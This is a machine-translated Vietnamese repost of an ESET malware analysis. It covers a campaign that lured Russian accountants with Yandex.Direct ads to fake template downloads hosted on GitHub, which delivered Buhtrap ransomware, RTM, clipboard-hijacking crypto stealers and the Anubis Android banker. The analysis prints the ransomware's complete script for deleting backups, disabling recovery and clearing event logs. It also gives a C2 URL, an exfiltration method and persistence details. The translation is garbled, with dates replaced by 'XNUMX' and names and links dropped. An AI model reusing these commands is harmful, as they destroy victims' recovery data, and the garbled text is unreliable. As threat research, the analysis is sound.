Để nhắm mục tiêu vào các kế toán viên trong một cuộc tấn công mạng, bạn có thể sử dụng các tài liệu công việc mà họ tìm kiếm trực tuyến. Đây gần giống như những gì một nhóm mạng đã làm trong vài tháng qua, phát tán các cửa hậu đã biết. и , cũng như các bộ mã hóa và phần mềm để đánh cắp tiền điện tử. Hầu hết các mục tiêu đều nằm ở Nga. Cuộc tấn công được thực hiện bằng cách đặt quảng cáo độc hại trên Yandex.Direct. Các nạn nhân tiềm năng được dẫn đến một trang web nơi họ được yêu cầu tải xuống một tệp độc hại được ngụy trang dưới dạng mẫu tài liệu. Yandex đã xóa quảng cáo độc hại sau cảnh báo của chúng tôi.
Mã nguồn của Buhtrap trước đây đã bị rò rỉ trên mạng nên ai cũng có thể sử dụng. Chúng tôi không có thông tin về tính khả dụng của mã RTM.
Trong bài đăng này, chúng tôi sẽ cho bạn biết cách những kẻ tấn công phân phối phần mềm độc hại bằng Yandex.Direct và lưu trữ nó trên GitHub. Bài đăng sẽ kết thúc bằng phân tích kỹ thuật về phần mềm độc hại.
Buhtrap và RTM hoạt động trở lại
Cơ chế lây lan và nạn nhân
Các tải trọng khác nhau được chuyển đến nạn nhân đều có chung một cơ chế lan truyền. Tất cả các tệp độc hại do kẻ tấn công tạo đều nằm ở hai kho GitHub khác nhau.
Thông thường, kho lưu trữ chứa một tệp độc hại có thể tải xuống và tệp này được thay đổi thường xuyên. Vì GitHub cho phép bạn xem lịch sử thay đổi đối với kho lưu trữ nên chúng tôi có thể biết phần mềm độc hại nào đã được phân phối trong một khoảng thời gian nhất định. Để thuyết phục nạn nhân tải xuống tệp độc hại, trang web Blanki-shabloni24[.]ru, như trong hình trên, đã được sử dụng.
Thiết kế của trang web và tất cả tên của các tệp độc hại tuân theo một khái niệm duy nhất - biểu mẫu, mẫu, hợp đồng, mẫu, v.v. Xem xét rằng phần mềm Buhtrap và RTM đã được sử dụng trong các cuộc tấn công vào kế toán trong quá khứ, chúng tôi cho rằng chiến lược trong chiến dịch mới là như nhau. Câu hỏi duy nhất là làm thế nào nạn nhân có thể truy cập được trang web của kẻ tấn công.
Nhiễm trùng
Ít nhất một số nạn nhân tiềm năng truy cập trang này đã bị thu hút bởi quảng cáo độc hại. Dưới đây là một URL ví dụ:
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
Như bạn có thể thấy từ liên kết, biểu ngữ đã được đăng trên diễn đàn kế toán hợp pháp bb.f2[.]kz. Điều quan trọng cần lưu ý là các biểu ngữ xuất hiện trên các trang web khác nhau, tất cả đều có cùng id chiến dịch (blanki_rsya) và hầu hết đều liên quan đến dịch vụ kế toán hoặc hỗ trợ pháp lý. URL cho thấy nạn nhân tiềm năng đã sử dụng yêu cầu "tải xuống biểu mẫu hóa đơn", hỗ trợ cho giả thuyết của chúng tôi về các cuộc tấn công có chủ đích. Dưới đây là các trang web nơi các biểu ngữ xuất hiện và các truy vấn tìm kiếm tương ứng.
- tải mẫu hóa đơn – bb.f2[.]kz
- hợp đồng mẫu - Ipopen[.]ru
- mẫu đơn khiếu nại - 77metrov[.]ru
- mẫu thỏa thuận - trống-dogor-kupli-prodazhi[.]ru
- mẫu đơn khởi kiện - zen.yandex[.]ru
- khiếu nại mẫu - yurday[.]ru
- mẫu hợp đồng – Regforum[.]ru
- mẫu hợp đồng – trợ lý[.]ru
- thỏa thuận căn hộ mẫu – napravah[.]com
- mẫu hợp đồng pháp lý - avito[.]ru
Trang web Blanki-shabloni24[.]ru có thể đã được định cấu hình để vượt qua bài đánh giá trực quan đơn giản. Thông thường, một quảng cáo trỏ đến một trang web có giao diện chuyên nghiệp có liên kết tới GitHub dường như không có gì là xấu. Ngoài ra, những kẻ tấn công chỉ tải các tệp độc hại lên kho lưu trữ trong một khoảng thời gian giới hạn, có thể là trong chiến dịch. Hầu hết thời gian, kho lưu trữ GitHub chứa kho lưu trữ zip trống hoặc tệp EXE trống. Do đó, những kẻ tấn công có thể phân phối quảng cáo thông qua Yandex.Direct trên các trang web có nhiều khả năng được các kế toán viên truy cập để phản hồi các truy vấn tìm kiếm cụ thể.
Tiếp theo, chúng ta hãy xem xét các tải trọng khác nhau được phân bổ theo cách này.
Phân tích tải trọng
Niên đại phân phối
Chiến dịch độc hại bắt đầu vào cuối tháng 2018 năm XNUMX và đang hoạt động tại thời điểm viết bài. Vì toàn bộ kho lưu trữ đã được cung cấp công khai trên GitHub nên chúng tôi đã biên soạn dòng thời gian chính xác về việc phân phối sáu dòng phần mềm độc hại khác nhau (xem hình bên dưới). Chúng tôi đã thêm một dòng hiển thị thời điểm phát hiện liên kết biểu ngữ, được đo bằng phương pháp đo từ xa của ESET, để so sánh với lịch sử git. Như bạn có thể thấy, điều này tương quan tốt với tính khả dụng của tải trọng trên GitHub. Sự khác biệt vào cuối tháng XNUMX có thể được giải thích là do chúng tôi không có một phần lịch sử thay đổi vì kho lưu trữ đã bị xóa khỏi GitHub trước khi chúng tôi có thể lấy nó đầy đủ.
Hình 1. Trình tự thời gian phát tán phần mềm độc hại.
Chứng chỉ ký mã
Chiến dịch đã sử dụng nhiều chứng chỉ. Một số được ký bởi nhiều họ phần mềm độc hại, điều này càng chỉ ra rằng các mẫu khác nhau thuộc về cùng một chiến dịch. Mặc dù có sẵn khóa riêng nhưng người vận hành đã không ký các mã nhị phân một cách có hệ thống và không sử dụng khóa cho tất cả các mẫu. Vào cuối tháng 2019 năm XNUMX, những kẻ tấn công bắt đầu tạo chữ ký không hợp lệ bằng chứng chỉ do Google sở hữu mà chúng không có khóa riêng.
Tất cả các chứng chỉ liên quan đến chiến dịch và dòng phần mềm độc hại mà chúng ký đều được liệt kê trong bảng bên dưới.
Chúng tôi cũng đã sử dụng các chứng chỉ ký mã này để thiết lập liên kết với các dòng phần mềm độc hại khác. Đối với hầu hết các chứng chỉ, chúng tôi không tìm thấy các mẫu không được phân phối qua kho lưu trữ GitHub. Tuy nhiên, chứng chỉ TOV “MARIYA” đã được sử dụng để ký phần mềm độc hại thuộc mạng botnet , phần mềm quảng cáo và thợ mỏ. Không chắc phần mềm độc hại này có liên quan đến chiến dịch này. Rất có thể, chứng chỉ đã được mua trên darknet.
Win32/FileCoder.Buhtrap
Thành phần đầu tiên thu hút sự chú ý của chúng tôi là Win32/Filecoding.Buhtrap mới được phát hiện. Đây là tệp nhị phân Delphi đôi khi được đóng gói. Nó chủ yếu được phân phối vào tháng 2019 đến tháng XNUMX năm XNUMX. Nó hoạt động giống như một chương trình ransomware - nó tìm kiếm các ổ đĩa cục bộ và thư mục mạng, đồng thời mã hóa các tệp được phát hiện. Nó không cần kết nối Internet để bị xâm phạm vì nó không liên lạc với máy chủ để gửi khóa mã hóa. Thay vào đó, nó thêm một “mã thông báo” vào cuối thông báo đòi tiền chuộc và đề xuất sử dụng email hoặc Bitmessage để liên hệ với các nhà điều hành.
Để mã hóa càng nhiều tài nguyên nhạy cảm càng tốt, Filecoding.Buhtrap chạy một luồng được thiết kế để tắt phần mềm chính có thể có trình xử lý tệp đang mở chứa thông tin có giá trị có thể cản trở quá trình mã hóa. Các quy trình mục tiêu chủ yếu là các hệ thống quản lý cơ sở dữ liệu (DBMS). Ngoài ra, Filecoding.Buhtrap còn xóa các file nhật ký và bản sao lưu khiến việc khôi phục dữ liệu trở nên khó khăn. Để thực hiện việc này, hãy chạy tập lệnh bó bên dưới.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
FileCoder.Buhtrap sử dụng dịch vụ IP Logger trực tuyến hợp pháp được thiết kế để thu thập thông tin về khách truy cập trang web. Điều này nhằm mục đích theo dõi nạn nhân của ransomware, đây là trách nhiệm của dòng lệnh:
mshta.exe "javascript:document.write('');"
Các tệp để mã hóa được chọn nếu chúng không khớp với ba danh sách loại trừ. Thứ nhất, các tệp có phần mở rộng sau không được mã hóa: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys và .con dơi. Thứ hai, tất cả các tệp có đường dẫn đầy đủ chứa chuỗi thư mục từ danh sách bên dưới đều bị loại trừ.
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
Thứ ba, một số tên tệp nhất định cũng bị loại khỏi quá trình mã hóa, trong số đó có tên tệp của thông báo đòi tiền chuộc. Danh sách được trình bày dưới đây. Rõ ràng, tất cả những trường hợp ngoại lệ này đều nhằm mục đích giữ cho máy hoạt động nhưng với khả năng đi đường ở mức tối thiểu.
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
Sơ đồ mã hóa tập tin
Sau khi được thực thi, phần mềm độc hại sẽ tạo ra cặp khóa RSA 512 bit. Số mũ riêng (d) và mô đun (n) sau đó được mã hóa bằng khóa chung 2048 bit được mã hóa cứng (số mũ và mô đun công khai), được đóng gói zlib và mã hóa base64. Mã chịu trách nhiệm cho việc này được hiển thị trong Hình 2.
Hình 2. Kết quả giải mã Hex-Rays của quá trình tạo cặp khóa RSA 512-bit.
Dưới đây là ví dụ về văn bản thuần túy có khóa riêng được tạo, là mã thông báo được đính kèm với thông báo đòi tiền chuộc.
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
Khóa công khai của kẻ tấn công được đưa ra dưới đây.
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
Các tệp được mã hóa bằng AES-128-CBC với khóa 256 bit. Đối với mỗi tệp được mã hóa, một khóa mới và vectơ khởi tạo mới sẽ được tạo. Thông tin chính được thêm vào cuối tệp được mã hóa. Hãy xem xét định dạng của tệp được mã hóa.
Các tệp được mã hóa có tiêu đề sau:
Dữ liệu tệp nguồn có bổ sung giá trị ma thuật VEGA được mã hóa thành 0x5000 byte đầu tiên. Tất cả thông tin giải mã được đính kèm vào một tệp có cấu trúc sau:
- Điểm đánh dấu kích thước tệp chứa một dấu cho biết tệp có kích thước lớn hơn 0x5000 byte hay không
— Khóa AES blob = ZlibCompress(RSAEncrypt(Khóa AES + IV, khóa chung của cặp khóa RSA được tạo))
- Khóa RSA blob = ZlibCompress(RSAEncrypt(khóa riêng RSA được tạo, khóa chung RSA được mã hóa cứng))
Win32/ClipBanker
Win32/ClipBanker là thành phần được phân phối không liên tục từ cuối tháng 2018 đến đầu tháng 4 năm XNUMX. Vai trò của nó là giám sát nội dung của bảng nhớ tạm, tìm kiếm địa chỉ của các ví tiền điện tử. Sau khi xác định địa chỉ ví mục tiêu, ClipBanker thay thế nó bằng một địa chỉ được cho là thuộc về nhà điều hành. Các mẫu chúng tôi kiểm tra không được đóng hộp cũng như không bị xáo trộn. Cơ chế duy nhất được sử dụng để che giấu hành vi là mã hóa chuỗi. Địa chỉ ví của nhà điều hành được mã hóa bằng RCXNUMX. Các loại tiền điện tử mục tiêu là Bitcoin, Bitcoin cash, Dogecoin, Ethereum và Ripple.
Trong thời gian phần mềm độc hại lây lan sang ví Bitcoin của kẻ tấn công, một lượng nhỏ đã được gửi đến VTS, điều này gây nghi ngờ về sự thành công của chiến dịch. Ngoài ra, không có bằng chứng nào cho thấy những giao dịch này có liên quan đến ClipBanker.
Win32/RTM
Thành phần Win32/RTM đã được phân phối trong vài ngày vào đầu tháng 2019 năm 2017. RTM là một Trojan ngân hàng được viết bằng Delphi, nhằm vào các hệ thống ngân hàng từ xa. Năm XNUMX, các nhà nghiên cứu của ESET đã công bố của chương trình này, mô tả vẫn có liên quan. Vào tháng 2019 năm XNUMX, Palo Alto Networks cũng đã phát hành .
Máy xúc Buhtrap
Đôi khi, một trình tải xuống có sẵn trên GitHub không giống với các công cụ Buhtrap trước đây. Anh ấy quay sang https://94.100.18[.]67/RSS.php?<some_id> để có được giai đoạn tiếp theo và tải nó trực tiếp vào bộ nhớ. Chúng ta có thể phân biệt hai hành vi của mã giai đoạn thứ hai. Trong URL đầu tiên, RSS.php đã trực tiếp chuyển qua cửa hậu Buhtrap - cửa hậu này rất giống với cửa hậu có sẵn sau khi mã nguồn bị rò rỉ.
Điều thú vị là chúng tôi thấy một số chiến dịch có cửa sau Buhtrap và chúng được cho là do các nhà khai thác khác nhau điều hành. Trong trường hợp này, điểm khác biệt chính là cửa sau được tải trực tiếp vào bộ nhớ và không sử dụng sơ đồ thông thường với quy trình triển khai DLL mà chúng ta đã nói đến. . Ngoài ra, các nhà khai thác đã thay đổi khóa RC4 dùng để mã hóa lưu lượng mạng tới máy chủ C&C. Trong hầu hết các chiến dịch mà chúng tôi đã thấy, người vận hành không thèm thay đổi khóa này.
Hành vi thứ hai, phức tạp hơn là URL RSS.php đã được chuyển đến một trình tải khác. Nó đã thực hiện một số thao tác làm xáo trộn, chẳng hạn như xây dựng lại bảng nhập động. Mục đích của bootloader là liên hệ với máy chủ C&C [.]com/api/F27F84EDA4D13B15/2, gửi nhật ký và chờ phản hồi. Nó xử lý phản hồi dưới dạng blob, tải nó vào bộ nhớ và thực thi nó. Tải trọng mà chúng ta thấy khi thực thi trình tải này là cùng một cửa hậu Buhtrap, nhưng có thể có các thành phần khác.
Android/Spy.Banker
Điều thú vị là một thành phần dành cho Android cũng được tìm thấy trong kho GitHub. Anh ấy chỉ ở chi nhánh chính một ngày - ngày 1 tháng 2018 năm XNUMX. Ngoài việc được đăng trên GitHub, phép đo từ xa của ESET không tìm thấy bằng chứng nào cho thấy phần mềm độc hại này đang được phân phối.
Thành phần này được lưu trữ dưới dạng Gói ứng dụng Android (APK). Nó bị xáo trộn nặng nề. Hành vi độc hại bị ẩn trong JAR được mã hóa nằm trong APK. Nó được mã hóa bằng RC4 bằng khóa này:
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
Khóa và thuật toán tương tự được sử dụng để mã hóa chuỗi. JAR nằm ở APK_ROOT + image/files. 4 byte đầu tiên của tệp chứa độ dài của JAR được mã hóa, bắt đầu ngay sau trường độ dài.
Sau khi giải mã tập tin, chúng tôi phát hiện ra đó là Anubis - trước đây nhân viên ngân hàng cho Android. Phần mềm độc hại có các tính năng sau:
- ghi âm micro
- chụp ảnh màn hình
- lấy tọa độ GPS
- keylogger
- mã hóa dữ liệu thiết bị và yêu cầu tiền chuộc
- gửi thư rác
Điều thú vị là nhân viên ngân hàng đã sử dụng Twitter làm kênh liên lạc dự phòng để có được một máy chủ C&C khác. Mẫu chúng tôi phân tích đã sử dụng tài khoản @JonesTrader nhưng tại thời điểm phân tích tài khoản này đã bị chặn.
Nhân viên ngân hàng chứa danh sách các ứng dụng mục tiêu trên thiết bị Android. Nó dài hơn danh sách thu được trong nghiên cứu của Sophos. Danh sách này bao gồm nhiều ứng dụng ngân hàng, chương trình mua sắm trực tuyến như Amazon và eBay cũng như các dịch vụ tiền điện tử.
MSIL/ClipBanker.IH
Thành phần cuối cùng được phân phối như một phần của chiến dịch này là tệp thực thi .NET Windows, xuất hiện vào tháng 2019 năm 1.0.0. Hầu hết các phiên bản được nghiên cứu đều được đóng gói với ConfuserEx vXNUMX. Giống như ClipBanker, thành phần này sử dụng clipboard. Mục tiêu của anh ấy là cung cấp nhiều loại tiền điện tử cũng như các ưu đãi trên Steam. Ngoài ra, anh ta còn sử dụng dịch vụ IP Logger để đánh cắp khóa WIF riêng tư của Bitcoin.
cơ chế bảo vệ
Ngoài những lợi ích mà ConfuserEx mang lại trong việc ngăn chặn việc gỡ lỗi, bán phá giá và giả mạo, thành phần này còn bao gồm khả năng phát hiện các sản phẩm chống vi-rút và máy ảo.
Để xác minh rằng nó chạy trong máy ảo, phần mềm độc hại sử dụng dòng lệnh Windows WMI (WMIC) tích hợp để yêu cầu thông tin BIOS, cụ thể là:
wmic bios
Sau đó chương trình phân tích đầu ra lệnh và tìm kiếm các từ khóa: VBOX, VirtualBox, XEN, qemu, bochs, VM.
Để phát hiện các sản phẩm chống vi-rút, phần mềm độc hại sẽ gửi yêu cầu Công cụ quản lý Windows (WMI) tới Trung tâm bảo mật Windows bằng cách sử dụng ManagementObjectSearcher API như hiển thị bên dưới. Sau khi giải mã từ base64, cuộc gọi sẽ như thế này:
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
Hình 3. Quy trình xác định các sản phẩm chống vi-rút.
Ngoài ra, phần mềm độc hại còn kiểm tra xem , một công cụ để bảo vệ khỏi các cuộc tấn công vào clipboard và nếu chạy sẽ tạm dừng tất cả các luồng trong quy trình đó, do đó vô hiệu hóa tính năng bảo vệ.
Kiên trì
Phiên bản phần mềm độc hại mà chúng tôi đã nghiên cứu sẽ tự sao chép vào %APPDATA%googleupdater.exe và đặt thuộc tính “ẩn” cho thư mục google. Sau đó cô ấy thay đổi giá trị SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell trong sổ đăng ký Windows và thêm đường dẫn updater.exe. Bằng cách này, phần mềm độc hại sẽ được thực thi mỗi khi người dùng đăng nhập.
Hành vi ác ý
Giống như ClipBanker, phần mềm độc hại giám sát nội dung của bảng ghi tạm và tìm kiếm địa chỉ ví tiền điện tử và khi tìm thấy, nó sẽ thay thế nó bằng một trong các địa chỉ của nhà điều hành. Dưới đây là danh sách các địa chỉ mục tiêu dựa trên những gì được tìm thấy trong mã.
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
Đối với mỗi loại địa chỉ có một biểu thức chính quy tương ứng. Giá trị STEAM_URL được sử dụng để tấn công hệ thống Steam, như có thể thấy từ biểu thức chính quy được sử dụng để xác định trong bộ đệm:
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Kênh lọc
Ngoài việc thay thế các địa chỉ trong bộ đệm, phần mềm độc hại còn nhắm mục tiêu vào các khóa WIF riêng tư của ví Bitcoin, Bitcoin Core và Electrum Bitcoin. Chương trình sử dụng plogger.org làm kênh lọc để lấy khóa riêng WIF. Để thực hiện việc này, người vận hành thêm dữ liệu khóa riêng tư vào tiêu đề HTTP Tác nhân người dùng, như hiển thị bên dưới.
Hình 4. Bảng điều khiển IP Logger với dữ liệu đầu ra.
Người vận hành không sử dụng iplogger.org để lọc ví. Có lẽ họ đã sử dụng một phương pháp khác do giới hạn 255 ký tự trong trường User-Agenthiển thị trong giao diện web IP Logger. Trong các mẫu chúng tôi nghiên cứu, máy chủ đầu ra khác được lưu trữ trong biến môi trường DiscordWebHook. Điều đáng ngạc nhiên là biến môi trường này không được gán ở bất kỳ đâu trong mã. Điều này cho thấy phần mềm độc hại vẫn đang được phát triển và biến này được gán cho máy kiểm tra của nhà điều hành.
Có một dấu hiệu khác cho thấy chương trình đang được phát triển. Tệp nhị phân bao gồm hai URL iplogger.org và cả hai đều được truy vấn khi dữ liệu được lọc. Trong yêu cầu tới một trong những URL này, giá trị trong trường Người giới thiệu được bắt đầu bằng “DEV /”. Chúng tôi cũng tìm thấy một phiên bản không được đóng gói bằng ConfuserEx, người nhận URL này có tên là DevFeedbackUrl. Dựa trên tên biến môi trường, chúng tôi tin rằng các nhà khai thác đang có kế hoạch sử dụng dịch vụ hợp pháp Discord và hệ thống chặn web của nó để đánh cắp ví tiền điện tử.
Kết luận
Chiến dịch này là một ví dụ về việc sử dụng các dịch vụ quảng cáo hợp pháp trong các cuộc tấn công mạng. Kế hoạch này nhắm vào các tổ chức của Nga, nhưng chúng tôi sẽ không ngạc nhiên khi thấy một cuộc tấn công như vậy sử dụng các dịch vụ không phải của Nga. Để tránh bị xâm phạm, người dùng phải tin tưởng vào uy tín của nguồn phần mềm mà họ tải xuống.
Danh sách đầy đủ các chỉ báo về sự thỏa hiệp và thuộc tính MITER ATT&CK có sẵn tại .
Nguồn: www.habr.com